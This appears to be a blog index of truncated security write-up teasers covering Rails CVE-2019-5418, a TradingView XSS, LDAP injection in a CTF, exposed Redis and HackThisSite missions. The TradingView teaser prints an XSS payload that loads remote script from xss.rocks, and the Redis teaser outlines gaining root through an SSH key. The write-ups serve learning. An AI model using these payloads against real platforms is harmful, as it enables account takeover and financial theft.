
Rails is a web application development framework written in the Ruby programming language. It is designed to make programming web applications easier by making assumptions about what every developer needs to get started.

[CVE-2019-5418] description: NVD

There is a File Content Disclosure vulnerability in Action View (Rails) <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed. Versions Affected: All. Not affected: None. Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1 The impact is limited to calls to render which render file contents without a specified accept format…



TradingView has popular charting libraries which are used in many online trading platforms for stocks or cryptocurrencies. This vulnerability is a fairly new XSS vulnerability. It could bypass Cloudflare or other defense mechanisms and cause financial losses through account request forgery or malicious manipulation. We are going to talk about the vuln and the mitigation.

0x01 Vulnerability and Attack

Since TradingView’s library is widely-used, we can easily find a test target amongst stock exchange or cryptocurrency exchange platforms. Now let’s try to trigger the alert dialog.

After a bit of trying and looking at the code, we have the payload.

Payload

#disabledFeatures=[]&enabledFeatures=[]&indicatorsFile=http://xss.rocks/xss.js



This is a straightforward company directory. The first thing that came to our mind was SQL injection, without thinking too much about the challenge name (because it was a 50-pt challenge…). After quickly trying a bunch of SQL injection payloads, we suddenly realized this is LDAP injection (duh), so we put * as the search query to confirm that it is indeed LDAP injection.

LDAP Injection:

LDAP Injection is an attack technique used to exploit web sites that construct LDAP statements from user-supplied input.

Lightweight Directory Access Protocol (LDAP) is an open-standard protocol for both querying and manipulating X.500 directory services.

The web app looks…



Redis is an open-source, widely popular data structure tool that can be used as an in-memory distributed database, message broker or cache. Since it is designed to be accessed inside trusted environments, it should not be exposed on the Internet. However, some Redis instances are bound to a public interface and even have no password authentication protection.

Under certain conditions, if Redis runs with the root account (or not even), attackers can write an SSH public key file to the root account, directly logging on to the victim server through SSH. …



Before my write-up, I want to mention that I read some well-written write-ups/tutorials after solving the Basic Missions, and they do a good job of guiding you in the right direction without spoilers. There are a ton of write-ups like these out there; you should read some of them just to see how others attack the same problem and from what angles.

Basic Mission Tutorial 1–10 — HackThisSite

1–10 Basic Mission guide, that is completely noob friendly — HackThisSite

Basic 1

Like it says, it’s “The Idiot Test”. The password is hidden in HTML source code.

Basic 2

I’m sure when everyone reads…



Have you ever heard of the Google Games? Get ready to have some fun! This “in a box” version of the Games includes head-to-head team competitions in a series of challenges including trivia, puzzles, word association, and coding.

At The Google Games RPI, competitors will compete against other students for victory in challenges that test your brains and creativity to their limits! It’s a continuum of fun as teams of five go head to head in rigorous events: trivia, puzzles, word association, and coding competitions. Teams of five undergraduate students will be competing for fun Google swag prizes.

I attended…

Victor Zhu

A Computer Science Student @ Rensselaer Polytechnic Institute who is intrigued by Cybersecurity. Favorite sport: Pentesting.
